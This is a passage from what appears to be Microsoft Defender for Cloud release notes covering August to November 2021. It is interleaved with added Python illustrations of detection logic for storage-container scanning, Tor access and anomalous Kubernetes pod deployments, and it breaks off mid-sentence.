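from datetime import datetime, timedelta
from typing import Dict, List, Set, Tuple

Record = Dict[str, object]

# Constructed log sample: one scanner that guesses container names and hits a public one,
# one scanner that only gets 404s, and a few reads, one of them authenticated over Tor.
LOGS: List[Record] = [
    {"time": "2021-12-01T10:00:00", "operation": "ListBlobs", "status": 404, "auth": "Anonymous", "ip": "203.0.113.7", "container": "backup"},
    {"time": "2021-12-01T10:00:01", "operation": "ListBlobs", "status": 404, "auth": "Anonymous", "ip": "203.0.113.7", "container": "backups"},
    {"time": "2021-12-01T10:00:02", "operation": "ListBlobs", "status": 404, "auth": "Anonymous", "ip": "203.0.113.7", "container": "data"},
    {"time": "2021-12-01T10:00:03", "operation": "ListBlobs", "status": 200, "auth": "Anonymous", "ip": "203.0.113.7", "container": "public"},
    {"time": "2021-12-01T10:05:00", "operation": "ListBlobs", "status": 404, "auth": "Anonymous", "ip": "198.51.100.9", "container": "logs"},
    {"time": "2021-12-01T10:05:01", "operation": "ListBlobs", "status": 404, "auth": "Anonymous", "ip": "198.51.100.9", "container": "archive"},
    {"time": "2021-12-01T10:05:02", "operation": "ListBlobs", "status": 404, "auth": "Anonymous", "ip": "198.51.100.9", "container": "exports"},
    {"time": "2021-12-01T10:20:00", "operation": "GetBlob", "status": 200, "auth": "OAuth", "ip": "192.0.2.50", "container": "finance"},
    {"time": "2021-12-01T10:21:00", "operation": "GetBlob", "status": 200, "auth": "Anonymous", "ip": "192.0.2.51", "container": "finance"},
    {"time": "2021-12-01T10:22:00", "operation": "GetBlob", "status": 200, "auth": "Anonymous", "ip": "192.0.2.52", "container": "public"},
]
TOR_EXIT_NODES: Set[str] = {"192.0.2.50", "192.0.2.51"}  # constructed; use a real exit-node feed in practice
AUTHENTICATED_BASELINE: Set[str] = {"finance"}            # constructed: containers normally read with credentials


def open_container_scanning(logs: List[Record], min_guesses: int = 3) -> List[Tuple[str, str, str]]:
    """Storage.Blob_OpenContainersScanning.*: per source IP, anonymous ListBlobs calls
    against several distinct container names inside one hour. Any 200 in the burst means
    the scanner found an open container (SuccessfulDiscovery, Medium); a burst made only
    of 404s is a FailedAttempt (Low)."""
    by_ip: Dict[str, List[Record]] = defaultdict(list)
    for r in logs:
        if r["operation"] == "ListBlobs" and r["auth"] == "Anonymous":
            by_ip[str(r["ip"])].append(r)
    alerts = []
    for ip, rows in by_ip.items():
        rows.sort(key=lambda r: str(r["time"]))
        start = datetime.fromisoformat(str(rows[0]["time"]))
        burst = [r for r in rows if datetime.fromisoformat(str(r["time"])) - start <= timedelta(hours=1)]
        if len({r["container"] for r in burst}) < min_guesses:
            continue  # a couple of typos from a legitimate client is not a scan
        if any(r["status"] == 200 for r in burst):
            alerts.append((ip, "Storage.Blob_OpenContainersScanning.SuccessfulDiscovery", "Medium"))
        elif all(r["status"] == 404 for r in burst):
            alerts.append((ip, "Storage.Blob_OpenContainersScanning.FailedAttempt", "Low"))
    return alerts


def tor_authenticated_access(logs: List[Record], tor_exits: Set[str]) -> List[Tuple[str, str]]:
    """Storage.Blob_TorAnomaly as retuned: only *authenticated*, successful requests from a
    Tor exit IP fire. Anonymous hits from Tor are dropped on purpose, which is what cuts
    the benign-positive rate described above."""
    hits = {(str(r["ip"]), str(r["container"])) for r in logs
            if r["ip"] in tor_exits and r["auth"] != "Anonymous" and 200 <= int(str(r["status"])) < 300}
    return sorted(hits)


def unusual_unauthenticated_access(logs: List[Record], baseline: Set[str]) -> List[Tuple[str, str]]:
    """Storage.Blob_AnonymousAccessAnomaly: a successful anonymous read of a container whose
    reads are normally authenticated, i.e. public read access that someone found or enabled."""
    hits = {(str(r["container"]), str(r["ip"])) for r in logs
            if r["auth"] == "Anonymous" and r["operation"] == "GetBlob"
            and r["status"] == 200 and r["container"] in baseline}
    return sorted(hits)


if __name__ == "__main__":
    print(open_container_scanning(LOGS))
    print(tor_authenticated_access(LOGS, TOR_EXIT_NODES))
    print(unusual_unauthenticated_access(LOGS, AUTHENTICATED_BASELINE))
```

On the sample, 203.0.113.7 produces the Medium SuccessfulDiscovery alert (it found the "public" container), 198.51.100.9 the Low FailedAttempt alert, the OAuth read from 192.0.2.50 fires the Tor alert while the anonymous hit from 192.0.2.51 does not, and that same anonymous read of "finance" is what the unauthenticated-access detection reports. If you maintain your own copies of these rules in a SIEM, the Tor "authenticated only" condition is the one to mirror, since it is the change most likely to silence existing suppression rules.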


'PortSweeping' alert removed from network layer alerts

The following alert was removed from our network layer alerts due to inefficiencies:

Alert: Possible outgoing port scanning activity detected
Alert type: PortSweeping
Description: Network traffic analysis detected suspicious outgoing traffic from {Compromised Host}.
This traffic may be a result of a port scanning activity. When the compromised resource is a load
balancer or an application gateway, the suspected outgoing traffic has originated from one or more
of the resources in the backend pool (of the load balancer or application gateway). If this behavior is
intentional, please note that performing port scanning is against Azure Terms of service. If this
behavior is unintentional, it may mean your resource has been compromised.
MITRE tactics: Discovery
Severity: Medium


November 2021

Our Ignite release includes:

- Azure Security Center and Azure Defender become Microsoft Defender for Cloud
- Native CSPM for AWS and threat protection for Amazon EKS, and AWS EC2
- Prioritize security actions by data sensitivity (powered by Microsoft Purview) (in preview)
- Expanded security control assessments with Azure Security Benchmark v3
- Microsoft Sentinel connector's optional bi-directional alert synchronization released for general
  availability (GA)
- New recommendation to push Azure Kubernetes Service (AKS) logs to Sentinel
- Recommendations mapped to the MITRE ATT&CK® framework - released for general availability
  (GA)

Other changes in November include:

- Microsoft Threat and Vulnerability Management added as vulnerability assessment solution -
  released for general availability (GA)
- Microsoft Defender for Endpoint for Linux now supported by Microsoft Defender for Servers -
  released for general availability (GA)
- Snapshot export for recommendations and security findings (in preview)
- Auto provisioning of vulnerability assessment solutions released for general availability (GA)
- Software inventory filters in asset inventory released for general availability (GA)
- New AKS security policy added to default initiative - for use by private preview customers only
- Inventory display of on-premises machines applies different template for resource name


Azure Security Center and Azure Defender become Microsoft
Defender for Cloud

According to the 2021 State of the Cloud report, 92% of organizations now have a multicloud
strategy. At Microsoft, our goal is to centralize security across these environments and help security
teams work more effectively.

Microsoft Defender for Cloud (formerly known as Azure Security Center and Azure Defender) is a
Cloud Security Posture Management (CSPM) and cloud workload protection (CWP) solution that
discovers weaknesses across your cloud configuration, helps strengthen the overall security posture of
your environment, and protects workloads across multicloud and hybrid environments.

At Ignite 2019, we shared our vision to create the most complete approach for securing your digital
estate and integrating XDR technologies under the Microsoft Defender brand. Unifying Azure Security
Center and Azure Defender under the new name Microsoft Defender for Cloud reflects the integrated
capabilities of our security offering and our ability to support any cloud platform.


Native CSPM for AWS and threat protection for Amazon EKS, and
AWS EC2

A new environment settings page provides greater visibility and control over your management
groups, subscriptions, and AWS accounts. The page is designed to onboard AWS accounts at scale:
connect your AWS management account, and you'll automatically onboard existing and future
accounts.

[Screenshot: Microsoft Defender for Cloud > Environment settings, listing Azure subscriptions and
AWS accounts (preview)]

When you've added your AWS accounts, Defender for Cloud protects your AWS resources with any or
all of the following plans:

- Defender for Cloud's CSPM features extend to your AWS resources. This agentless plan assesses
  your AWS resources according to AWS-specific security recommendations, and these are included
  in your secure score. The resources will also be assessed for compliance with built-in standards
  specific to AWS (AWS CIS, AWS PCI DSS, and AWS Foundational Security Best Practices). Defender
  for Cloud's asset inventory page is a multicloud enabled feature helping you manage your AWS
  resources alongside your Azure resources.
- Microsoft Defender for Kubernetes extends its container threat detection and advanced
  defenses to your Amazon EKS Linux clusters.
- Microsoft Defender for Servers brings threat detection and advanced defenses to your Windows
  and Linux EC2 instances. This plan includes the integrated license for Microsoft Defender for
  Endpoint, security baselines and OS level assessments, vulnerability assessment scanning,
  adaptive application controls (AAC), file integrity monitoring (FIM), and more.

Learn more about connecting your AWS accounts to Microsoft Defender for Cloud.


Prioritize security actions by data sensitivity (powered by Microsoft
Purview) (in preview)

Data resources remain a popular target for threat actors. So it's crucial for security teams to identify,
prioritize, and secure sensitive data resources across their cloud environments.

To address this challenge, Microsoft Defender for Cloud now integrates sensitivity information from
Microsoft Purview. Microsoft Purview is a unified data governance service that provides rich insights
into the sensitivity of your data within multicloud and on-premises workloads.

The integration with Microsoft Purview extends your security visibility in Defender for Cloud from the
infrastructure level down to the data, enabling an entirely new way to prioritize resources and security
activities for your security teams.

Learn more in Prioritize security actions by data sensitivity.


Expanded security control assessments with Azure Security
Benchmark v3

Microsoft Defender for Cloud's security recommendations are enabled and supported by the Azure
Security Benchmark.

Azure Security Benchmark is the Microsoft-authored, Azure-specific set of guidelines for security and
compliance best practices based on common compliance frameworks. This widely respected
benchmark builds on the controls from the Center for Internet Security (CIS) and the National
Institute of Standards and Technology (NIST) with a focus on cloud-centric security.

From Ignite 2021, Azure Security Benchmark v3 is available in Defender for Cloud's regulatory
compliance dashboard and enabled as the new default initiative for all Azure subscriptions protected
with Microsoft Defender for Cloud.

Enhancements for v3 include:

- Additional mappings to industry frameworks PCI-DSS v3.2.1 and CIS Controls v8.
- More granular and actionable guidance for controls with the introduction of:
  - Security Principles - Providing insight into the overall security objectives that build the
    foundation for our recommendations.
  - Azure Guidance - The technical "how-to" for meeting these objectives.
- New controls include DevOps security for issues such as threat modeling and software supply
  chain security, as well as key and certificate management for best practices in Azure.

Learn more in Introduction to Azure Security Benchmark.


Microsoft Sentinel connector's optional bi-directional alert
synchronization released for general availability (GA)

In July, we announced a preview feature, bi-directional alert synchronization, for the built-in
connector in Microsoft Sentinel (Microsoft's cloud-native SIEM and SOAR solution). This feature is now
released for general availability (GA).

When you connect Microsoft Defender for Cloud to Microsoft Sentinel, the status of security alerts is
synchronized between the two services. So, for example, when an alert is closed in Defender for Cloud,
that alert will display as closed in Microsoft Sentinel as well. Changing the status of an alert in
Defender for Cloud won't affect the status of any Microsoft Sentinel incidents that contain the
synchronized Microsoft Sentinel alert, only that of the synchronized alert itself.

When you enable bi-directional alert synchronization, you'll automatically sync the status of the
original Defender for Cloud alerts with Microsoft Sentinel incidents that contain the copies of those
Defender for Cloud alerts. So, for example, when a Microsoft Sentinel incident containing a Defender
for Cloud alert is closed, Defender for Cloud will automatically close the corresponding original alert.

Learn more in Connect Azure Defender alerts from Azure Security Center and Stream alerts to Azure
Sentinel.


New recommendation to push Azure Kubernetes Service (AKS) logs
to Sentinel

In a further enhancement to the combined value of Defender for Cloud and Microsoft Sentinel, we'll
now highlight Azure Kubernetes Service instances that aren't sending log data to Microsoft Sentinel.

SecOps teams can choose the relevant Microsoft Sentinel workspace directly from the
recommendation details page and immediately enable the streaming of raw logs. This seamless
connection between the two products makes it easy for security teams to ensure complete logging
coverage across their workloads to stay on top of their entire environment.

The new recommendation, "Diagnostic logs in Kubernetes services should be enabled", includes the
'Fix' option for faster remediation.

We've also enhanced the "Auditing on SQL server should be enabled" recommendation with the same
Sentinel streaming capabilities.


Recommendations mapped to the MITRE ATT&CK® framework -
released for general availability (GA)

We've enhanced Defender for Cloud's security recommendations to show their position on the MITRE
ATT&CK® framework. This globally accessible knowledge base of threat actors' tactics and techniques,
based on real-world observations, provides more context to help you understand the associated risks
of the recommendations for your environment.

You'll find these tactics wherever you access recommendation information:

- Azure Resource Graph query results for relevant recommendations include the MITRE ATT&CK®
  tactics and techniques.
- Recommendation details pages show the mapping for all relevant recommendations:

  [Screenshot: details page for "Management ports should be closed on your virtual machines",
  showing Tactics and techniques: Initial Access, External Remote Services (T1133)]

- The recommendations page in Defender for Cloud has a new filter to select
  recommendations according to their associated tactic.

Learn more in Review your security recommendations.


Microsoft Threat and Vulnerability Management added as
vulnerability assessment solution - released for general availability
(GA)

In October, we announced an extension to the integration between Microsoft Defender for Servers and
Microsoft Defender for Endpoint, to support a new vulnerability assessment provider for your
machines: Microsoft threat and vulnerability management. This feature is now released for general
availability (GA).

Use threat and vulnerability management to discover vulnerabilities and misconfigurations in near
real time with the integration with Microsoft Defender for Endpoint enabled, and without the need for
additional agents or periodic scans. Threat and vulnerability management prioritizes vulnerabilities
based on the threat landscape and detections in your organization.

Use the security recommendation "A vulnerability assessment solution should be enabled on your
virtual machines" to surface the vulnerabilities detected by threat and vulnerability management for
your supported machines.

To automatically surface the vulnerabilities, on existing and new machines, without the need to
manually remediate the recommendation, see Vulnerability assessment solutions can now be auto
enabled (in preview).

Learn more in Investigate weaknesses with Microsoft Defender for Endpoint's threat and vulnerability
management.


Microsoft Defender for Endpoint for Linux now supported by
Microsoft Defender for Servers - released for general availability
(GA)

In August, we announced preview support for deploying the Defender for Endpoint for Linux sensor to
supported Linux machines. This feature is now released for general availability (GA).

Microsoft Defender for Servers includes an integrated license for Microsoft Defender for Endpoint.
Together, they provide comprehensive endpoint detection and response (EDR) capabilities.

When Defender for Endpoint detects a threat, it triggers an alert. The alert is shown in Defender for
Cloud. From Defender for Cloud, you can also pivot to the Defender for Endpoint console, and perform
a detailed investigation to uncover the scope of the attack.

Learn more in Protect your endpoints with Security Center's integrated EDR solution: Microsoft
Defender for Endpoint.


Snapshot export for recommendations and security findings (in
preview)

Defender for Cloud generates detailed security alerts and recommendations. You can view them in the
portal or through programmatic tools. You might also need to export some or all of this information
for tracking with other monitoring tools in your environment.

Defender for Cloud's continuous export feature lets you fully customize what will be exported, and
where it will go. Learn more in Continuously export Microsoft Defender for Cloud data.

Even though the feature is called continuous, there's also an option to export weekly snapshots. Until
now, these weekly snapshots were limited to secure score and regulatory compliance data. We've
added the capability to export recommendations and security findings.


Auto provisioning of vulnerability assessment solutions released
for general availability (GA)

In October, we announced the addition of vulnerability assessment solutions to Defender for Cloud's
auto provisioning page. This is relevant to Azure virtual machines and Azure Arc machines on
subscriptions protected by Azure Defender for Servers. This feature is now released for general
availability (GA).

If the integration with Microsoft Defender for Endpoint is enabled, Defender for Cloud presents a
choice of vulnerability assessment solutions:

- (NEW) The Microsoft threat and vulnerability management module of Microsoft Defender for
  Endpoint (see the release note)
- The integrated Qualys agent

Your chosen solution will be automatically enabled on supported machines.

Learn more in Automatically configure vulnerability assessment for your machines.


Software inventory filters in asset inventory released for general
availability (GA)

In October, we announced new filters for the asset inventory page to select machines running specific
software - and even specify the versions of interest. This feature is now released for general availability
(GA).

You can query the software inventory data in Azure Resource Graph Explorer.

To use these features, you'll need to enable the integration with Microsoft Defender for Endpoint.

For full details, including sample Kusto queries for Azure Resource Graph, see Access a software
inventory.


New AKS security policy added to default initiative - for use by
private preview customers only

To ensure that Kubernetes workloads are secure by default, Defender for Cloud includes Kubernetes
level policies and hardening recommendations, including enforcement options with Kubernetes
admission control.

As part of this project, we've added a policy and recommendation (disabled by default) for gating
deployment on Kubernetes clusters. The policy is in the default initiative but is only relevant for
organizations who register for the related private preview.

You can safely ignore the policy and recommendation ("Kubernetes clusters should gate deployment
of vulnerable images") and there will be no impact on your environment.

If you'd like to participate in the private preview, you'll need to be a member of the private preview
ring. If you're not already a member, submit a request. Members will be notified when the
preview begins.


Inventory display of on-premises machines applies different
template for resource name

To improve the presentation of resources in the Asset inventory, we've removed the "source-computer-
IP" element from the template for naming on-premises machines.

- Previous format: machine-name_source-computer-id_VMUUID
- From this update: machine-name_VMUUID


October 2021

Updates in October include:

- Microsoft Threat and Vulnerability Management added as vulnerability assessment solution (in
  preview)
- Vulnerability assessment solutions can now be auto enabled (in preview)
- Software inventory filters added to asset inventory (in preview)
- Changed prefix of some alert types from "ARM_" to "VM_"
- Changes to the logic of a security recommendation for Kubernetes clusters
- Recommendations details pages now show related recommendations
- New alerts for Azure Defender for Kubernetes (in preview)


Microsoft Threat and Vulnerability Management added as
vulnerability assessment solution (in preview)

We've extended the integration between Azure Defender for Servers and Microsoft Defender for
Endpoint, to support a new vulnerability assessment provider for your machines: Microsoft threat and
vulnerability management.

Use threat and vulnerability management to discover vulnerabilities and misconfigurations in near
real time with the integration with Microsoft Defender for Endpoint enabled, and without the need for
additional agents or periodic scans. Threat and vulnerability management prioritizes vulnerabilities
based on the threat landscape and detections in your organization.

Use the security recommendation "A vulnerability assessment solution should be enabled on your
virtual machines" to surface the vulnerabilities detected by threat and vulnerability management for
your supported machines.

To automatically surface the vulnerabilities, on existing and new machines, without the need to
manually remediate the recommendation, see Vulnerability assessment solutions can now be auto
enabled (in preview).

Learn more in Investigate weaknesses with Microsoft Defender for Endpoint's threat and vulnerability
management.


Vulnerability assessment solutions can now be auto enabled (in
preview)

Security Center's auto provisioning page now includes the option to automatically enable a
vulnerability assessment solution on Azure virtual machines and Azure Arc machines on subscriptions
protected by Azure Defender for Servers.

If the integration with Microsoft Defender for Endpoint is enabled, Defender for Cloud presents a
choice of vulnerability assessment solutions:

- (NEW) The Microsoft threat and vulnerability management module of Microsoft Defender for
  Endpoint (see the release note)
- The integrated Qualys agent

[Screenshot: Auto provisioning > Extensions, deployment configuration for "Vulnerability
assessment solution for Azure Machines and Azure Arc enabled machines"]

Your chosen solution will be automatically enabled on supported machines.

Learn more in Automatically configure vulnerability assessment for your machines.


Software inventory filters added to asset inventory (in preview)

The asset inventory page now includes a filter to select machines running specific software - and even
specify the versions of interest.

Additionally, you can query the software inventory data in Azure Resource Graph Explorer.

To use these new features, you'll need to enable the integration with Microsoft Defender for Endpoint.

For full details, including sample Kusto queries for Azure Resource Graph, see Access a software
inventory.

[Screenshot: Asset inventory filtered by "Installed applications", listing detected software such as
7-Zip, Oracle MySQL, Adobe Acrobat Reader DC and Microsoft Windows Defender with per-application
resource counts]


Changed prefix of some alert types from "ARM_" to "VM_"

In July 2021, we announced a logical reorganization of some of the Azure Defender plans, in which we
moved twenty-one alerts from Azure Defender for Resource Manager to Azure Defender for Servers.

With this update, we've changed the prefixes of these alerts to match this reassignment and replaced
"ARM_" with "VM_" as shown in the following table:

Original name                                       From this change
ARM_AmBroadFilesExclusion                           VM_AmBroadFilesExclusion
ARM_AmDisablementAndCodeExecution                   VM_AmDisablementAndCodeExecution
ARM_AmDisablement                                   VM_AmDisablement
ARM_AmFileExclusionAndCodeExecution                 VM_AmFileExclusionAndCodeExecution
ARM_AmTempFileExclusionAndCodeExecution             VM_AmTempFileExclusionAndCodeExecution
ARM_AmTempFileExclusion                             VM_AmTempFileExclusion
ARM_AmRealtimeProtectionDisabled                    VM_AmRealtimeProtectionDisabled
ARM_AmTempRealtimeProtectionDisablement             VM_AmTempRealtimeProtectionDisablement
ARM_AmRealtimeProtectionDisablementAndCodeExec      VM_AmRealtimeProtectionDisablementAndCodeExec
ARM_AmMalwareCampaignRelatedExclusion               VM_AmMalwareCampaignRelatedExclusion
ARM_AmTemporarilyDisablement                        VM_AmTemporarilyDisablement
ARM_UnusualAmFileExclusion                          VM_UnusualAmFileExclusion
ARM_CustomScriptExtensionSuspiciousCmd              VM_CustomScriptExtensionSuspiciousCmd
ARM_CustomScriptExtensionSuspiciousEntryPoint       VM_CustomScriptExtensionSuspiciousEntryPoint
ARM_CustomScriptExtensionSuspiciousPayload          VM_CustomScriptExtensionSuspiciousPayload
ARM_CustomScriptExtensionSuspiciousFailure          VM_CustomScriptExtensionSuspiciousFailure
ARM_CustomScriptExtensionUnusualDeletion            VM_CustomScriptExtensionUnusualDeletion
ARM_CustomScriptExtensionUnusualExecution           VM_CustomScriptExtensionUnusualExecution
ARM_VMAccessUnusualConfigReset                      VM_VMAccessUnusualConfigReset
ARM_VMAccessUnusualPasswordReset                    VM_VMAccessUnusualPasswordReset
ARM_VMAccessUnusualSSHReset                         VM_VMAccessUnusualSSHReset

Learn more about the Azure Defender for Resource Manager and Azure Defender for Servers plans.


Changes to the logic of a security recommendation for Kubernetes clusters


The recommendation "Kubernetes clusters should not use the default namespace" prevents usage of 
the default namespace for a range of resource types. Two of the resource types that were included in 
this recommendation have been removed: ConfigMap and Secret. 


Learn more about this recommendation and hardening your Kubernetes clusters in Understand Azure 
Policy for Kubernetes clusters. 


Recommendations details pages now show related 
recommendations 


To clarify the relationships between different recommendations, we've added a Related 
recommendations area to the details pages of many recommendations. 


The three relationship types that are shown on these pages are: 


• Prerequisite - A recommendation that must be completed before the selected recommendation
• Alternative - A different recommendation which provides another way of achieving the goals of the selected recommendation
• Dependent - A recommendation for which the selected recommendation is a prerequisite


For each related recommendation, the number of unhealthy resources is shown in the "Affected resources" column.


Tip
If a related recommendation is grayed out, its dependency isn't yet completed and so isn't available.

An example of related recommendations: 


1. Security Center checks your machines for supported vulnerability assessment solutions: 
A vulnerability assessment solution should be enabled on your virtual machines 


2. If one is found, you'll get notified about discovered vulnerabilities: 
Vulnerabilities in your virtual machines should be remediated 


Obviously, Security Center can't notify you about discovered vulnerabilities unless it finds a supported vulnerability assessment solution. Therefore:


• Recommendation #1 is a prerequisite for recommendation #2
• Recommendation #2 depends upon recommendation #1
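
The prerequisite/dependent relationship above, worked through as an added example (not Security Center code): it models the three relationship types, derives which recommendation the details page would show grayed out because its prerequisite isn't completed, and computes a remediation order. The affected-resource counts are constructed.

```python
# Added illustration of the prerequisite/alternative/dependent relationships; not Security Center code.
from __future__ import annotations

from dataclasses import dataclass, field


@dataclass
class Recommendation:
    """One recommendation as it appears on its details page."""
    name: str
    unhealthy_resources: int  # the "Affected resources" count
    prerequisites: set[str] = field(default_factory=set)
    alternatives: set[str] = field(default_factory=set)

    @property
    def completed(self) -> bool:
        # Completed once no resource is unhealthy for this recommendation.
        return self.unhealthy_resources == 0


class RecommendationGraph:
    """Relationships between recommendations and what the details page derives from them."""

    def __init__(self, recs: list[Recommendation]):
        self.recs = {r.name: r for r in recs}
        for r in recs:
            for ref in r.prerequisites | r.alternatives:
                if ref not in self.recs:
                    raise ValueError(f"{r.name!r} references unknown recommendation {ref!r}")
        self.remediation_order()  # raises if prerequisites form a cycle

    def dependents(self, name: str) -> set[str]:
        """Dependent is the inverse of prerequisite: all that list `name` as a prerequisite."""
        return {r.name for r in self.recs.values() if name in r.prerequisites}

    def is_available(self, name: str) -> bool:
        """Grayed out (unavailable) while any prerequisite is still incomplete."""
        return all(self.recs[p].completed for p in self.recs[name].prerequisites)

    def related(self, name: str) -> dict[str, list[dict]]:
        """The 'Related recommendations' area: affected count and availability per type."""
        rec = self.recs[name]

        def row(other: str) -> dict:
            return {"name": other,
                    "affected_resources": self.recs[other].unhealthy_resources,
                    "available": self.is_available(other)}

        return {"prerequisite": [row(p) for p in sorted(rec.prerequisites)],
                "alternative": [row(a) for a in sorted(rec.alternatives)],
                "dependent": [row(d) for d in sorted(self.dependents(name))]}

    def remediation_order(self) -> list[str]:
        """Kahn's topological sort over prerequisites: each recommendation is listed
        only after everything it depends on; a cycle is a modelling error."""
        indegree = {n: len(r.prerequisites) for n, r in self.recs.items()}
        ready = sorted(n for n, d in indegree.items() if d == 0)
        order: list[str] = []
        while ready:
            current = ready.pop(0)
            order.append(current)
            for dep in sorted(self.dependents(current)):
                indegree[dep] -= 1
                if indegree[dep] == 0:
                    ready.append(dep)
        if len(order) != len(self.recs):
            raise ValueError("prerequisite cycle detected")
        return order


# The page's example: #1 is a prerequisite for #2. Resource counts are constructed.
VA_ENABLED = "A vulnerability assessment solution should be enabled on your virtual machines"
VULNS_REMEDIATED = "Vulnerabilities in your virtual machines should be remediated"


def page_example(va_unhealthy: int = 12) -> RecommendationGraph:
    """Until a scanner is found, #2 reports no findings yet is not available."""
    return RecommendationGraph([
        Recommendation(VA_ENABLED, unhealthy_resources=va_unhealthy),
        Recommendation(VULNS_REMEDIATED, unhealthy_resources=0, prerequisites={VA_ENABLED}),
    ])
```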


New alerts for Azure Defender for Kubernetes (in preview)


To expand the threat protections provided by Azure Defender for Kubernetes, we've added two preview alerts.


These alerts are generated based on a new machine learning model and Kubernetes advanced 
analytics, measuring multiple deployment and role assignment attributes against previous activities in 
the cluster and across all clusters monitored by Azure Defender. 


Alert (alert type): Anomalous pod deployment (Preview) (K8S_AnomalousPodDeployment)
Description: Kubernetes audit log analysis detected a pod deployment that is anomalous based on previous pod deployment activity. The activity is considered anomalous when the different features seen in the deployment operation are taken into account in relation to one another. The features monitored by this analytics include the container image registry used, the account performing the deployment, the day of the week, how often this account performs pod deployments, the user agent used in the operation, whether pod deployments often occur in this namespace, and other features. The top contributing reasons for raising this alert as anomalous activity are detailed under the alert's extended properties.
MITRE tactic: Execution
Severity: Medium

Alert (alert type): Excessive role permissions assigned in Kubernetes cluster (Preview) (K8S_ServiceAcountPermissionAnomaly)
Description: Analysis of the Kubernetes audit logs detected an excessive permissions role assignment to your cluster. From examining role assignments, the listed permissions are uncommon to the specific service account. This detection considers previous role assignments to the same service account across clusters monitored by Azure, the volume per permission, and the impact of the specific permission. The anomaly detection model used for this alert takes into account how this permission is used across all clusters monitored by Azure Defender.
MITRE tactic: Privilege Escalation
Severity: Low


For a full list of the Kubernetes alerts, see Alerts for Kubernetes clusters. 
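As an added illustration, not Microsoft's detection model, the following Python scores a pod-create event against a baseline of earlier deployments on the features the alert description names (registry, account, day of week, user agent, namespace) and reports the top contributing reasons, the way the alert's extended properties do. The audit events and their field names are constructed and simplified.

```python
# Added illustration of feature-rarity scoring for pod deployments; not Microsoft's model.
from __future__ import annotations

import math
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Features named in the alert description: registry, account, weekday, user agent, namespace.
FEATURES = ("registry", "user", "weekday", "user_agent", "namespace")


def extract_features(event: dict) -> dict[str, str]:
    """Reduce one pod-create event (simplified, constructed schema) to scored features."""
    first = event["image"].split("/", 1)[0]
    # An image reference whose first path element is not a host defaults to Docker Hub.
    registry = first if ("." in first or ":" in first) else "docker.io"
    weekday = datetime.fromisoformat(event["timestamp"]).strftime("%A")
    return {
        "registry": registry,
        "user": event["user"],
        "weekday": weekday,
        "user_agent": event["user_agent"].split("/", 1)[0],  # tool name only
        "namespace": event["namespace"],
    }


class DeploymentBaseline:
    """Frequency counts of each feature value over earlier deployments."""

    def __init__(self, history: list[dict]):
        self.total = len(history)
        self.counts: dict[str, Counter] = defaultdict(Counter)
        for event in history:
            for name, value in extract_features(event).items():
                self.counts[name][value] += 1

    def surprise(self, name: str, value: str) -> float:
        """-log P(value | feature), add-one smoothed so unseen values score high but finite."""
        seen = self.counts[name][value]
        distinct = len(self.counts[name]) + 1  # one extra bucket for unseen values
        return -math.log((seen + 1) / (self.total + distinct))

    def score(self, event: dict) -> tuple[float, list[tuple[str, str, float]]]:
        """Total surprise and the per-feature contributions, highest first."""
        feats = extract_features(event)
        contributions = [(n, feats[n], self.surprise(n, feats[n])) for n in FEATURES]
        contributions.sort(key=lambda c: c[2], reverse=True)
        return sum(c[2] for c in contributions), contributions


def evaluate(baseline: DeploymentBaseline, event: dict, threshold: float = 8.0) -> dict:
    """Verdict in the shape of an alert: flag, score and top contributing reasons."""
    total, contributions = baseline.score(event)
    return {
        "anomalous": total > threshold,
        "score": round(total, 2),
        "top_reasons": [f"{name}={value}" for name, value, _ in contributions[:3]],
    }


def constructed_history() -> list[dict]:
    """Constructed baseline: a CI account deploys twice per working day for 4 weeks."""
    events = []
    for day in range(28):
        date = datetime(2021, 10, 4) + timedelta(days=day)  # 2021-10-04 is a Monday
        if date.weekday() >= 5:  # skip weekends
            continue
        for hour in (9, 15):
            events.append({
                "timestamp": date.replace(hour=hour).isoformat(),
                "user": "system:serviceaccount:ci:deploy-bot",
                "user_agent": "kubectl/v1.21.0 (linux/amd64)",
                "namespace": "payments",
                "image": "contoso.azurecr.io/payments/api:1.4",
            })
    return events


# Constructed candidates: a routine deployment and one that differs on every feature.
ROUTINE_EVENT = {
    "timestamp": "2021-11-01T09:00:00",  # a Monday
    "user": "system:serviceaccount:ci:deploy-bot",
    "user_agent": "kubectl/v1.21.0 (linux/amd64)",
    "namespace": "payments",
    "image": "contoso.azurecr.io/payments/api:1.5",
}
UNUSUAL_EVENT = {
    "timestamp": "2021-11-06T02:13:00",  # a Saturday, small hours
    "user": "jdoe@contoso.com",
    "user_agent": "curl/7.68.0",
    "namespace": "kube-system",
    "image": "someuser/netshoot:latest",  # Docker Hub, no registry host
}


def demo() -> tuple[dict, dict]:
    baseline = DeploymentBaseline(constructed_history())
    return evaluate(baseline, ROUTINE_EVENT), evaluate(baseline, UNUSUAL_EVENT)
```

The routine event scores low because only its weekday carries any surprise (one of five), while the unusual event is unseen on every feature, and the Saturday deployment ranks first among the reasons.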


September 2021 


In September, the following update was released: 


Two new recommendations to audit OS configurations for Azure 
security baseline compliance (in preview) 


The following two recommendations have been released to assess your machines' compliance with the 
Windows security baseline and the Linux security baseline: 


• For Windows machines, Vulnerabilities in security configuration on your Windows machines should be remediated (powered by Guest Configuration)
• For Linux machines, Vulnerabilities in security configuration on your Linux machines should be remediated (powered by Guest Configuration)


These recommendations make use of the guest configuration feature of Azure Policy to compare the 
OS configuration of a machine with the baseline defined in the Azure Security Benchmark. 


Learn more about using these recommendations in Harden a machine's OS configuration using guest 
configuration. 


August 2021 


Updates in August include: 


• Microsoft Defender for Endpoint for Linux now supported by Azure Defender for Servers (in preview)
• Two new recommendations for managing endpoint protection solutions (in preview)
• Built-in troubleshooting and guidance for solving common issues
• Regulatory compliance dashboard's Azure Audit reports released for general availability (GA)
• Deprecated recommendation 'Log Analytics agent health issues should be resolved on your machines'
• Azure Defender for container registries now scans for vulnerabilities in registries protected with Azure Private Link
• Security Center can now auto provision the Azure Policy's Guest Configuration extension (in preview)
• Recommendations to enable Azure Defender plans now support "Enforce"
• CSV exports of recommendation data now limited to 20 MB
• Recommendations page now includes multiple views


Microsoft Defender for Endpoint for Linux now supported by Azure 
Defender for Servers (in preview) 


Azure Defender for Servers includes an integrated license for Microsoft Defender for Endpoint.
Together, they provide comprehensive endpoint detection and response (EDR) capabilities. 


When Defender for Endpoint detects a threat, it triggers an alert. The alert is shown in Security Center. 
From Security Center, you can also pivot to the Defender for Endpoint console, and perform a detailed 
investigation to uncover the scope of the attack. 


During the preview period, you'll deploy the Defender for Endpoint for Linux sensor to supported Linux machines in one of two ways depending on whether you've already deployed it to your Windows machines:

